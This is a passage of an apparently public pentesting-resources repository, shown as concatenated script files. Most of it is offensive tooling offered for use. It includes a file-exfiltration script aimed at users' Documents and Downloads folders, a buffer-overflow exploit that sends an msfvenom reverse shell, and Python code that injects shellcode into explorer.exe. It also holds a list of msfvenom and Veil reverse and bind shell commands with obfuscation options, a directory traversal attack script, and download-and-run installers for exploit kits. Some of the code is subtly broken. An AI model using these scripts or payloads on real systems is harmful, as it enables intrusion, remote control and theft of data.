if [ -n "$new_directories" ]; then 64 | # If new directories were found, log them and send an alert 65 | echo "New directories found on $domain:" 66 | echo "$new_directories" 67 | fi 68 | -------------------------------------------------------------------------------- /scripts/automation/SubsToNotion.py: -------------------------------------------------------------------------------- 1 | # Title: SubToNotion - Automated Subdomain Recon 2 | # Config: Add your target domain and url to the script. 3 | # Date: 17 April 2023 4 | # Setting up Notion: 5 | # Create a new database with two properties: 6 | # 1. "URL" - property type: "URL" 7 | # 2. "Date Discovered" - property type: "Date" 8 | 9 | import os 10 | import subprocess 11 | import time 12 | from notion_client import Client 13 | from datetime import datetime 14 | 15 | # Initialize Notion client 16 | notion = Client(auth=os.environ["NOTION_API_KEY"]) 17 | 18 | # Replace with your database's URL property name and Notion page URL 19 | database_url_property_name = "URL" 20 | notion_database_url = "NOTION_DATABASE_URL" 21 | 22 | # Functions to interact with Notion 23 | def query_database(database_id): 24 | existing_records = {} 25 | results = notion.databases.query({"database_id": database_id}).get("results") 26 | for result in results: 27 | existing_records[result.properties[database_url_property_name].url] = result 28 | return existing_records 29 | 30 | def add_to_database(database_id, url): 31 | new_page = { 32 | "URL": {"url": url}, 33 | "Date Discovered": {"date": {"start": datetime.now().isoformat()}} 34 | } 35 | notion.pages.create(parent={"database_id": database_id}, properties=new_page) 36 | 37 | def api_request_with_retry(func, *args, **kwargs): 38 | max_retries = 5 39 | retry_delay = 10 40 | for i in range(max_retries): 41 | try: 42 | return func(*args, **kwargs) 43 | except Exception as e: 44 | if "API rate limit exceeded" in str(e) and i < max_retries - 1: 45 | time.sleep(retry_delay) 46 | else: 47 | raise e 48 | 49 | # Get the database_id 50 | database_id = api_request_with_retry(notion.databases.retrieve, notion_database_url)["id"] 51 | 52 | # Get existing subdomains from the database 53 | existing_records = api_request_with_retry(query_database, database_id) 54 | 55 | # Save existing subdomains in a temporary file to use as a blacklist 56 | with open("blacklist.txt", "w") as blacklist_file: 57 | for subdomain in existing_records: 58 | blacklist_file.write(subdomain + "\n") 59 | 60 | # Call Amass and Assetfinder, and capture the output of subdomains 61 | domain = "example.com" # Replace with your domain 62 | amass_output = subprocess.check_output(["amass", "enum", "-d", domain, "-bl", "blacklist.txt"]).decode().split("\n") 63 | assetfinder_output = subprocess.check_output(["assetfinder", "--subs-only", domain, "--exclude-subs-file", "blacklist.txt"]).decode().split("\n") 64 | 65 | # Sanitize the output to include only domain names 66 | subdomains = set([s for s in amass_output + assetfinder_output if '.' in s]) 67 | 68 | # Remove the temporary blacklist file 69 | os.remove("blacklist.txt") 70 | 71 | # Save new domains to the database if they are not already listed 72 | for subdomain in subdomains: 73 | if subdomain and subdomain not in existing_records: 74 | api_request_with_retry(add_to_database, database_id, subdomain) 75 | 76 | # Set up a cron job that will run this script every hour (outside the script) 77 | # Add the following to crontab, etc: 0 * * * * /path/to/python /path/to/your/script.py 78 | -------------------------------------------------------------------------------- /scripts/automation/SubsToSQL.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sqlite3 3 | import subprocess 4 | import requests 5 | from datetime import datetime 6 | 7 | # Replace with your domain 8 | domain = "example.com" 9 | 10 | # Replace with your webhook URL 11 | webhook_url = "WEBHOOK_URL" 12 | 13 | # Set up SQLite database 14 | conn = sqlite3.connect("subdomains.db") 15 | cursor = conn.cursor() 16 | cursor.execute('''CREATE TABLE IF NOT EXISTS subdomains ( 17 | id INTEGER PRIMARY KEY, 18 | url TEXT NOT NULL UNIQUE, 19 | date_discovered TEXT NOT NULL, 20 | notified INTEGER DEFAULT 0 21 | )''') 22 | conn.commit() 23 | 24 | # Functions to interact with SQLite database 25 | def query_database(): 26 | cursor.execute("SELECT url FROM subdomains") 27 | existing_records = [row[0] for row in cursor.fetchall()] 28 | return existing_records 29 | 30 | def add_to_database(url): 31 | date_discovered = datetime.now().isoformat() 32 | cursor.execute("INSERT INTO subdomains (url, date_discovered) VALUES (?, ?)", (url, date_discovered)) 33 | conn.commit() 34 | 35 | def mark_as_notified(url): 36 | cursor.execute("UPDATE subdomains SET notified = 1 WHERE url = ?", (url,)) 37 | conn.commit() 38 | 39 | # Call webhook function 40 | def call_webhook(subdomain): 41 | try: 42 | response = requests.post(webhook_url, json={"text": f"New subdomain found: {subdomain}"}) 43 | response.raise_for_status() 44 | return True 45 | except requests.exceptions.RequestException as e: 46 | print(f"Error calling webhook: {e}") 47 | return False 48 | 49 | # Get existing subdomains from the database 50 | existing_records = query_database() 51 | 52 | # Call Amass and Assetfinder, and capture the output of subdomains 53 | amass_output = subprocess.check_output(["amass", "enum", "-d", domain]).decode().split("\n") 54 | assetfinder_output = subprocess.check_output(["assetfinder", "--subs-only", domain]).decode().split("\n") 55 | 56 | # Sanitize the list of subdomains 57 | subdomains = set(amass_output + assetfinder_output) 58 | 59 | # Save new domains to the database if they are not already listed 60 | for subdomain in subdomains: 61 | if subdomain and subdomain not in existing_records: 62 | add_to_database(subdomain) 63 | 64 | # Call webhook and mark the record as notified if successful 65 | if call_webhook(subdomain): 66 | mark_as_notified(subdomain) 67 | 68 | # Close the database connection 69 | conn.close() 70 | 71 | # Set up a cron job that will run this script every hour (outside the script) 72 | # Add the following to crontab, etc: 73 | # 0 * * * * /path/to/python /path/to/your/script.py 74 | -------------------------------------------------------------------------------- /scripts/automation/TrendyWordlister.py: -------------------------------------------------------------------------------- 1 | """ 2 | Fetch and Append Trending Topics to a Wordlist 3 | """ 4 | 5 | import requests 6 | from bs4 import BeautifulSoup 7 | import subprocess 8 | 9 | def fetch_trending_topics(): 10 | url = "https://en.wikipedia.org/wiki/Wikipedia:Top_25_Report" 11 | response = requests.get(url) 12 | soup = BeautifulSoup(response.content, 'html.parser') 13 | topics = [] 14 | for item in soup.select("h3 + ul")[0].select("li"): 15 | topic = item.get_text(separator=" ", strip=True) 16 | topics.append(topic) 17 | return topics[:10] 18 | 19 | def append_topics_to_file_with_anew(topics, file_path): 20 | for topic in topics: 21 | subprocess.run(['anew', file_path], input=topic.encode()) 22 | 23 | file_path = '/mnt/data/trending_topics.txt' 24 | trending_topics = fetch_trending_topics() 25 | append_topics_to_file_with_anew(trending_topics, file_path) 26 | 27 | file_path 28 | -------------------------------------------------------------------------------- /scripts/exfil/lil-doc-snatcher.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Description: A quick exfil for Mac and Linux. 4 | # Exports files to disk and logs filesystem up to 1GB total size. 5 | # Mod file size as needed. 6 | 7 | # Test the ability to copy files. 8 | if ! cp /etc/hosts /dev/null >/dev/null; then 9 | echo "This script requires permission to copy files." >&2 10 | exit 1 11 | fi 12 | 13 | LOOT_DIR="/exfilit" 14 | SUB_DIR="$LOOT_DIR/files" 15 | SRC_DIRS=("$HOME/Documents" "$HOME/Downloads") 16 | SIZE_LIMIT=1000000000 # 1GB in bytes 17 | 18 | # Create the destination directory and its parent directories if they do not exist. 19 | mkdir -p "$SUB_DIR" 20 | 21 | # Update the access time of the output files without modifying their contents. 22 | touch -a "$LOOT_DIR"/{large_files,folders}.txt 23 | 24 | # Loop through all files in the source directories and copy them to the destination directory, 25 | # up to the size limit. 26 | total_size=0 27 | while [ $total_size -lt $SIZE_LIMIT ]; do 28 | file=$(find "${SRC_DIRS[@]}" -type f -size +1M -print -quit) 29 | if [ -z "$file" ]; then 30 | break 31 | fi 32 | size=$(stat -c%s "$file") 33 | if [ $((total_size + size)) -gt $SIZE_LIMIT ]; then 34 | break 35 | fi 36 | cp "$file" "$SUB_DIR" 37 | total_size=$((total_size + size)) 38 | done 39 | 40 | # Append the names of all directories to the folders.txt file. 41 | find "${SRC_DIRS[@]}" -type d -print0 | xargs -0 -I {} sh -c 'echo {} >> "$LOOT_DIR/folders.txt"' 42 | -------------------------------------------------------------------------------- /scripts/exploits/buffer_jump.py: -------------------------------------------------------------------------------- 1 | """ 2 | This program tests for buffer overflow vulnerabilities in a target application by sending a string of increasing length 3 | and constructing a payload to exploit the vulnerability. The payload is designed to gain root access to the target system. 4 | The program uses the Mona framework to identify the memory location where the pattern overwrote the buffer, find bad characters, 5 | and determine the right module to target. 6 | 7 | Author: Some dumb AI 8 | """ 9 | 10 | import os 11 | import socket 12 | import sys 13 | import time 14 | 15 | # Prompt user for target IP and port 16 | ip = input("Enter the target IP address: ") 17 | port = input("Enter the target port: ") 18 | 19 | # Create a string of increasing length to send to the application to test for a buffer overflow 20 | buffer = "" 21 | for i in range(100, 5000, 100): 22 | buffer += "A" * i 23 | 24 | # Connect to the target application and send the buffer 25 | try: 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.connect((ip, int(port))) 28 | print(f"Sending {len(buffer)} bytes...") 29 | s.send(buffer.encode()) 30 | s.close() 31 | print("Buffer sent successfully. Check the application to see if it crashed.") 32 | except: 33 | print("Error connecting to server.") 34 | sys.exit() 35 | 36 | # If the application has crashed, use Mona to identify the memory location where the pattern overwrote the buffer. 37 | # Use the identified offset to construct the payload that will exploit the vulnerability. 38 | if input("Did the application crash? (Y/N) ").upper() == "Y": 39 | try: 40 | # Generate a unique pattern using Mona 41 | os.system("mona pattern_create 5000 > pattern.txt") 42 | 43 | # Send the pattern to the application 44 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 45 | s.connect((ip, int(port))) 46 | with open("pattern.txt", "r") as f: 47 | pattern = f.read() 48 | print(f"Sending {len(pattern)} bytes...") 49 | s.send(pattern.encode()) 50 | s.close() 51 | print("Pattern sent successfully. Check the application to see where the pattern overwrote the buffer.") 52 | except: 53 | print("Error connecting to server.") 54 | sys.exit() 55 | 56 | # Get the offset where the pattern overwrote the buffer 57 | offset = input("Enter the value of EIP (eg. 41396f41): ") 58 | try: 59 | os.system(f"mona findmsp -distance 5000 -pattern {offset} -n") 60 | except: 61 | print("Error running Mona.") 62 | sys.exit() 63 | 64 | # Use Mona to find bad characters 65 | try: 66 | os.system("mona bytearray -cpb \"\\x00\"") 67 | os.system("mona compare -f bytearray.bin -a -o badchars.txt") 68 | except: 69 | print("Error running Mona.") 70 | sys.exit() 71 | 72 | # Use Mona to find the right module 73 | try: 74 | os.system("mona modules") 75 | os.system("mona jmp -r esp -m ") 76 | except: 77 | print("Error running Mona.") 78 | sys.exit() 79 | 80 | # Generate the final payload and send it to the application to gain root access 81 | try: 82 | os.system(f"msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b \"\\x00\" -f python -v shellcode") 83 | with open("shellcode", "r") as f: 84 | shellcode = f.read() 85 | encoded_shellcode = shellcode.encode("latin-1").hex() 86 | buffer = "A" * 2003 + "B" * 4 + encoded_shellcode 87 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 88 | s.connect((ip, int(port))) 89 | print(f"Sending {len(buffer)} bytes...") 90 | s.send(buffer.encode()) 91 | s.close() 92 | print("Payload sent successfully. Check the listener to see if you have gained root access.") 93 | except: 94 | print("Error connecting to server 95 | -------------------------------------------------------------------------------- /scripts/exploits/python-injection-example.sh: -------------------------------------------------------------------------------- 1 | #First, we need to create a payload using the Metasploit Framework. We can use the following command to generate a simple Windows reverse shell payload in raw format: 2 | 3 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f raw -o payload.raw 4 | 5 | #Next, we need to create a Python script that will inject the payload into explorer.exe. Here's an example: 6 | 7 | import struct 8 | import ctypes 9 | 10 | # Replace with your own payload file name 11 | filename = "payload.raw" 12 | 13 | # Open the payload file and read its contents 14 | with open(filename, "rb") as f: 15 | payload = f.read() 16 | 17 | # Convert the memory address of the explorer.exe process to an integer 18 | explorer_addr = 0x{insert explorer.exe address here} 19 | 20 | # Open the process using the obtained address 21 | process = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, explorer_addr) 22 | 23 | # Allocate memory in the explorer.exe process for the payload 24 | address = ctypes.windll.kernel32.VirtualAllocEx(process, 0, len(payload), 0x1000, 0x40) 25 | 26 | # Write the payload to the allocated memory 27 | written = ctypes.c_ulong(0) 28 | ctypes.windll.kernel32.WriteProcessMemory(process, address, payload, len(payload), ctypes.byref(written)) 29 | 30 | # Create a new thread in the explorer.exe process that will execute the payload 31 | thread_id = ctypes.c_ulong(0) 32 | kernel32 = ctypes.windll.kernel32 33 | start_addr = address 34 | hThread = kernel32.CreateRemoteThread(process, None, 0, start_addr, None, 0, ctypes.byref(thread_id)) 35 | 36 | print(f"Injected payload into explorer.exe with thread ID {thread_id}") 37 | -------------------------------------------------------------------------------- /scripts/exploits/veil-venom-shells.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | # MSVenom payloads 4 | 5 | # Windows Reverse TCP Meterpreter 6 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o reverse_meterpreter.exe 7 | 8 | # Linux Reverse TCP Meterpreter 9 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o reverse_meterpreter.elf 10 | 11 | # macOS Reverse TCP Meterpreter 12 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho -o reverse_shell.macho 13 | 14 | # Android Reverse TCP Meterpreter 15 | msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -o reverse_meterpreter.apk 16 | 17 | # PHP Reverse TCP Meterpreter 18 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw -o reverse_shell.php 19 | 20 | # Generate a Windows x86 reverse shell payload in the Powershell format 21 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f powershell -o reverse_shell.ps1 22 | 23 | # Generate a Linux x86 bind shell payload in the Python format 24 | msfvenom -p linux/x86/shell/bind_tcp LPORT= -f python -o bind_shell.py 25 | 26 | # Generate a macOS x86 reverse TCP Meterpreter payload that connects through an HTTP proxy 27 | msfvenom -p osx/x86/meterpreter/reverse_tcp LHOST= LPORT= -f macho -o reverse_meterpreter.macho HTTP_PROXY=http://proxy.example.com:8080 28 | 29 | # Generate a Windows x64 reverse HTTPS Meterpreter payload that encrypts communications with RC4 30 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= -f exe -o reverse_meterpreter.exe ENCODING=rc4 31 | 32 | 33 | # Veil payloads 34 | 35 | # Generate a custom payload with a specific name and set of evasion techniques 36 | python Veil.py -p python/meterpreter/rev_http -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -H 5' 37 | 38 | # Generate a payload with a custom shellcode encoder 39 | python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-x alpha_mixed' 40 | 41 | # Generate a payload with custom obfuscation options 42 | python Veil.py -p python/meterpreter/reverse_tcp -o my_payload -t python -c '-t PS -Obfuscate true -ObfuscationType 3 -OutDirectory /root/veil/payloads/obfuscated' 43 | 44 | # Generate a payload with an encrypted communication channel 45 | python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -C :' 46 | -------------------------------------------------------------------------------- /scripts/foothold-to-escalation/Readme.md: -------------------------------------------------------------------------------- 1 | # Toolbox 2 | 1. [Windows Toolkit](#1-wintools) 3 | 2. [Mixed Bag](#2-escalatemytools) 4 | --- 5 | 6 | ## 1. `winTools` 7 | 8 | ### **Usage** 9 | Run either of following commands Using `wget` or `curl` to download all tools into a `tools` directory: 10 | 11 | ```bash 12 | wget -O wintools.sh https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/refs/heads/main/scripts/foothold-to-escalation/winTools.sh && chmod +x wintools.sh && ./wintools.sh 13 | ``` 14 | 15 | ```bash 16 | curl -L -o wintools.sh https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/refs/heads/main/scripts/foothold-to-escalation/winTools.sh && chmod +x wintools.sh && ./wintools.sh 17 | ``` 18 | 19 | ### **Active Directory & Privilege Escalation Tools** 20 | - [ADelegator](https://github.com/canix1/ADelegator) - AD delegation enumeration tool 21 | - [ScriptSentry](https://github.com/NetSPI/ScriptSentry) - Detects unauthorized PowerShell script execution 22 | - [PingCastle](https://github.com/vletoux/pingcastle) - Active Directory security health check 23 | - [Locksmith](https://github.com/HarmJ0y/LockSmith) - Identifies weak AD permissions and security issues 24 | - [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) - AD reconnaissance tool 25 | - [PowerSharpPack](https://github.com/S3cur3Th1sSh1t/PowerSharpPack) - A collection of C# tools for AD penetration testing 26 | - [PrivescCheck](https://github.com/itm4n/PrivescCheck) - Windows privilege escalation checker 27 | - [NetTools](https://github.com/Wh1t3Rh1n0/Net-Tools) - Windows networking tools for enumeration 28 | 29 | ### **Certificate & NTLM Tools** 30 | - [Certipy](https://github.com/ly4k/Certipy) - Toolkit for Active Directory Certificate Services (ADCS) abuse 31 | - [Responder](https://github.com/SpiderLabs/Responder) - LLMNR, NBT-NS, and MDNS poisoner 32 | - [Impacket](https://github.com/SecureAuthCorp/impacket) - Python toolkit for network protocol exploitation 33 | - [Kerbute](https://github.com/cube0x0/Kerbute) - Kerberos ticket manipulation tool 34 | 35 | ### **Recon & AD Enumeration** 36 | - [Maester](https://github.com/FSecureLABS/maester) - AD intelligence gathering and enumeration tool 37 | - [Msftrecon](https://github.com/0x4D31/msftrecon) - Microsoft-focused reconnaissance framework 38 | - [TSS Data Collection Scripts](https://github.com/microsoft/tss-tools) - Microsoft support tools for troubleshooting 39 | - [ADMiner](https://github.com/dirkjanm/adidnsdump) - Extracts DNS records from Active Directory-integrated DNS 40 | 41 | ### **Credential & Network Tools** 42 | - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - Post-exploitation tool for AD 43 | 44 | ### **Microsoft Sysinternals Tool** 45 | - [ADExplorer](https://download.sysinternals.com/files/ADExplorer.zip) - Microsoft Sysinternals AD object viewer 46 | --- 47 | 48 | ## 2. `escalateMyTools` 49 | 50 | Granular tool installation script. Windows and Linux. 51 | 52 | - Using curl: 53 | ```sh 54 | curl -sSL https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/main/scripts/foothold-to-escalation/escalateMyTools.py -o escalateMyTools.py && chmod +x escalateMyTools.py && ./escalateMyTools.py --interactive 55 | ``` 56 | 57 | - Using wget: 58 | ```sh 59 | wget https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/main/scripts/foothold-to-escalation/escalateMyTools.py -O escalateMyTools.py && chmod +x escalateMyTools.py && ./escalateMyTools.py --interactive 60 | ``` 61 | 62 | ### Options 63 | ``` 64 | Do you want to run the script with any of the following flags? 65 | 1. --cleanup 66 | 2. --install-pspy 67 | 3. --install-netexec 68 | 4. --install-impacket 69 | 5. --install-both (pspy and NetExec) 70 | 6. No flags 71 | Enter the number corresponding to your choice: 72 | ``` 73 | 74 | ## Tool List 75 | 76 | ### CVE-Specific Exploits: 77 | - cve-2016-5195-dirtycow.c (Linux kernel privilege escalation) 78 | - cve-2019-13272-exploit.sh (Linux kernel privilege escalation) 79 | - cve-2020-3452-exploit.py (Cisco ASA/FTD arbitrary file read) 80 | - cve-2020-1472-exploit.py (Netlogon Elevation of Privilege) 81 | - cve-2021-3156-exploit.c (Sudo buffer overflow) 82 | - cve-2021-1675-exploit.py (PrintNightmare) 83 | - walkingpath.py (CVE-2022-4510, affects Google Titan Security Keys) 84 | - CVE-2017-0213.cpp (Windows COM Elevation of Privilege) 85 | 86 | ### Linux Tools: 87 | - LinEnum.sh (https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh) 88 | - linpeas.sh (https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh) 89 | - linux-exploit-suggester.sh (https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh) 90 | - pspy64 (https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64) 91 | 92 | ### Windows Tools: 93 | - Invoke-PowerShellTcp.ps1 (https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1) 94 | - PowerUp.ps1 (https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1) 95 | - Seatbelt.ps1 (https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Seatbelt.exe) 96 | - Invoke-SharpUp.ps1 (https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1) 97 | - winPEAS.ps1 (https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1) 98 | - Windows-Exploit-Suggester.py (https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py) 99 | - LaZagne.py (https://raw.githubusercontent.com/AlessandroZ/LaZagne/master/Windows/laZagne.py) 100 | - CVE-2017-0213.cpp (https://github.com/SecWiki/windows-kernel-exploits/blob/master/CVE-2017-0213/CVE-2017-0213.cpp) 101 | 102 | ## General Tools 103 | - log4j-scan.py (https://raw.githubusercontent.com/fullhunt/log4j-scan/master/log4j-scan.py) 104 | - mcafee_sitelist_pwd_decrypt.py (https://raw.githubusercontent.com/funoverip/mcafee-sitelist-pwd-decryption/master/mcafee_sitelist_pwd_decrypt.py) 105 | - pentestmonkey-php-reverse-shell.php (https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) 106 | 107 | 108 | _Credit to all the tool authors, if missing contact directly._ 109 | -------------------------------------------------------------------------------- /scripts/foothold-to-escalation/traverserHunt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | This script performs a directory traversal attack on a target URL specified by the user. 4 | It prompts the user for the target URL, validates the input, and performs the attack using 5 | a specified number of traversal levels. It displays progress messages and only prints valid 6 | URLs that return a 200 OK response. 7 | """ 8 | 9 | import requests 10 | import validators 11 | import re 12 | 13 | # Prompt the user for the target URL 14 | while True: 15 | url = input("Please enter the target URL: ") 16 | if validators.url(url): 17 | break 18 | else: 19 | print("Invalid URL. Please try again.") 20 | 21 | # Prompt the user for the number of traversal levels 22 | while True: 23 | num_levels = input("Please enter the number of traversal levels (default: 20): ") 24 | if num_levels == "": 25 | num_levels = 20 26 | break 27 | elif num_levels.isnumeric(): 28 | num_levels = int(num_levels) 29 | break 30 | else: 31 | print("Invalid input. Please enter a numeric value or leave blank for default.") 32 | 33 | # Perform the directory traversal attack 34 | response = requests.get(url) 35 | 36 | file_paths = re.findall('"((?:\\.|[^"\\])*)"', response.text) 37 | 38 | num_valid_urls = 0 39 | 40 | for path in file_paths: 41 | if "=" in path: 42 | for i in range(num_levels): 43 | url = url + "../" 44 | url += path 45 | try: 46 | response = requests.get(url) 47 | if response.status_code == 200: 48 | print(url) 49 | num_valid_urls += 1 50 | else: 51 | break 52 | except requests.exceptions.RequestException as e: 53 | print("An error occurred:", e) 54 | break 55 | 56 | # Display a summary of the results 57 | print(f"Directory traversal attack complete. Found {num_valid_urls} valid URLs.") 58 | -------------------------------------------------------------------------------- /scripts/foothold-to-escalation/winTools.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -euo pipefail 3 | 4 | TARGET_DIR="tools" 5 | mkdir -p "$TARGET_DIR" 6 | cd "$TARGET_DIR" || exit 1 7 | 8 | declare -A repos=( 9 | ["ScriptSentry"]="https://github.com/techspence/ScriptSentry" 10 | ["PingCastle"]="https://github.com/vletoux/pingcastle" 11 | ["Locksmith"]="https://github.com/jakehildreth/Locksmith" 12 | ["PowerSploit"]="https://github.com/PowerShellMafia/PowerSploit" 13 | ["PowerSharpPack"]="https://github.com/S3cur3Th1sSh1t/PowerSharpPack" 14 | ["PrivescCheck"]="https://github.com/itm4n/PrivescCheck" 15 | ["ADACLScanner"]="https://github.com/canix1/ADACLScanner" 16 | ["Certipy"]="https://github.com/ly4k/Certipy" 17 | ["Responder"]="https://github.com/SpiderLabs/Responder" 18 | ["Impacket"]="https://github.com/SecureAuthCorp/impacket" 19 | ["Kerbrute"]="https://github.com/ropnop/kerbrute" 20 | ["Maester"]="https://github.com/maester365/maester" 21 | ["ADMiner"]="https://github.com/dirkjanm/adidnsdump" 22 | ["CrackMapExec"]="https://github.com/byt3bl33d3r/CrackMapExec" 23 | ["ROADtools"]="https://github.com/dirkjanm/ROADtools" 24 | ["BloodHound"]="https://github.com/BloodHoundAD/BloodHound" 25 | ) 26 | 27 | declare -A cloned 28 | 29 | echo "--- Cloning GitHub Repositories ---" 30 | for tool in "${!repos[@]}"; do 31 | repo_url=${repos[$tool]} 32 | target_name="$tool" 33 | 34 | if [ -e "$target_name" ]; then 35 | echo "[$target_name] exists, skipping." 36 | continue 37 | fi 38 | 39 | if [[ -n "${cloned[$repo_url]:-}" ]]; then 40 | existing_tool_dir=${cloned[$repo_url]} 41 | echo "[$target_name] uses same repo as [$existing_tool_dir], linking." 42 | if [ -d "$existing_tool_dir" ]; then 43 | ln -s "$existing_tool_dir" "$target_name" 44 | else 45 | echo "Warning: Source [$existing_tool_dir] not found. Skipping link for [$target_name]." 46 | fi 47 | else 48 | echo "Cloning [$target_name] from $repo_url" 49 | if git clone --depth 1 "$repo_url" "$target_name"; then 50 | cloned["$repo_url"]="$target_name" 51 | else 52 | echo "Error cloning [$target_name]. Skipping." 53 | rm -rf "$target_name" 54 | fi 55 | fi 56 | done 57 | echo "--- Finished Cloning ---" 58 | 59 | echo "--- Handling PowerView Symlink ---" 60 | POWERSPLOIT_DIR="PowerSploit" 61 | POWERVIEW_DIR="PowerView" 62 | POWERVIEW_SUBDIR="Recon" 63 | if [ -d "$POWERSPLOIT_DIR" ] && [ ! -e "$POWERVIEW_DIR" ]; then 64 | if [ -d "$POWERSPLOIT_DIR/$POWERVIEW_SUBDIR" ]; then 65 | echo "Creating symlink for [PowerView]" 66 | ln -s "$POWERSPLOIT_DIR/$POWERVIEW_SUBDIR" "$POWERVIEW_DIR" 67 | else 68 | echo "Warning: [$POWERSPLOIT_DIR/$POWERVIEW_SUBDIR] not found. Cannot link PowerView." 69 | fi 70 | elif [ -e "$POWERVIEW_DIR" ]; then 71 | echo "[PowerView] exists, skipping link." 72 | elif [ ! -d "$POWERSPLOIT_DIR" ]; then 73 | echo "Warning: [$POWERSPLOIT_DIR] not found. Cannot link PowerView." 74 | fi 75 | 76 | echo "--- Handling ADExplorer Download ---" 77 | ADEXPLORER_DIR="ADExplorer" 78 | if [ ! -d "$ADEXPLORER_DIR" ]; then 79 | echo "Downloading ADExplorer" 80 | mkdir "$ADEXPLORER_DIR" 81 | if curl -L -o "$ADEXPLORER_DIR/ADExplorer.zip" "https://download.sysinternals.com/files/ADExplorer.zip"; then 82 | echo "ADExplorer downloaded." 83 | else 84 | echo "Error downloading ADExplorer." 85 | rm -rf "$ADEXPLORER_DIR" 86 | fi 87 | else 88 | echo "[ADExplorer] exists, skipping download." 89 | fi 90 | 91 | echo "--- Handling TSS Tools Download ---" 92 | TSS_DIR="TSS" 93 | if [ ! -d "$TSS_DIR" ]; then 94 | echo "Downloading TSS Tools" 95 | mkdir "$TSS_DIR" 96 | if curl -L -o "$TSS_DIR/TSS.zip" "https://aka.ms/getTSS"; then 97 | echo "TSS Tools downloaded." 98 | else 99 | echo "Error downloading TSS Tools." 100 | rm -rf "$TSS_DIR" 101 | fi 102 | else 103 | echo "[TSS] exists, skipping download." 104 | fi 105 | 106 | echo "" 107 | echo "Tool download process finished into '$TARGET_DIR' directory." 108 | -------------------------------------------------------------------------------- /scripts/recon/ipsweep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Loop the subnet, list connected hosts. 3 | #Take arg 1 as input to scan 4 | 5 | if [ "$1" == "" ] 6 | then 7 | echo "You forgot an IP address" 8 | echo "Syntax: ./ipsweep.sh 192.168.10" 9 | 10 | else 11 | for ip in `seq 1 254`; do 12 | ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" & 13 | done 14 | fi 15 | -------------------------------------------------------------------------------- /scripts/recon/maxrecon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #This is a comprehensive reconnaissance script that chains together various tools to perform reconnaissance on a given domain. It performs subdomain enumeration, port scanning, directory brute-forcing, parameter fuzzing, and vulnerability scanning. Note that some tools require additional installations. 3 | 4 | 5 | # Take a domain as an argument 6 | if [ -z $1 ]; then 7 | echo "Usage: $0 domain.com" 8 | exit 1 9 | fi 10 | 11 | # Install necessary tools 12 | sudo apt-get update 13 | sudo apt-get install -y jq nmap 14 | 15 | if ! command -v go &> /dev/null 16 | then 17 | echo "Go is not installed. Installing..." 18 | sudo apt-get install -y golang-go 19 | else 20 | echo "Go is already installed." 21 | fi 22 | 23 | if ! command -v git &> /dev/null 24 | then 25 | echo "Git is not installed. Installing..." 26 | sudo apt-get install -y git 27 | else 28 | echo "Git is already installed." 29 | fi 30 | 31 | if ! command -v cargo &> /dev/null 32 | then 33 | echo "Cargo is not installed. Installing..." 34 | curl -sSf | sh -s -- -y 35 | export PATH=$HOME/.cargo/bin:$PATH 36 | else 37 | echo "Cargo is already installed." 38 | fi 39 | 40 | if ! command -v assetfinder &> /dev/null 41 | then 42 | echo "assetfinder is not installed. Installing..." 43 | go get -u github.com/tomnomnom/assetfinder 44 | else 45 | echo "assetfinder is already installed." 46 | fi 47 | 48 | if ! command -v amass &> /dev/null 49 | then 50 | echo "amass is not installed. Installing..." 51 | go get -u github.com/OWASP/Amass/v3/... 52 | else 53 | echo "amass is already installed." 54 | fi 55 | 56 | if ! command -v subfinder &> /dev/null 57 | then 58 | echo "subfinder is not installed. Installing..." 59 | go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder 60 | else 61 | echo "subfinder is already installed." 62 | fi 63 | 64 | if ! command -v findomain &> /dev/null 65 | then 66 | echo "findomain is not installed. Installing..." 67 | git clone 68 | cd Findomain 69 | cargo build --release 70 | sudo cp target/release/findomain /usr/bin/ 71 | cd .. 72 | else 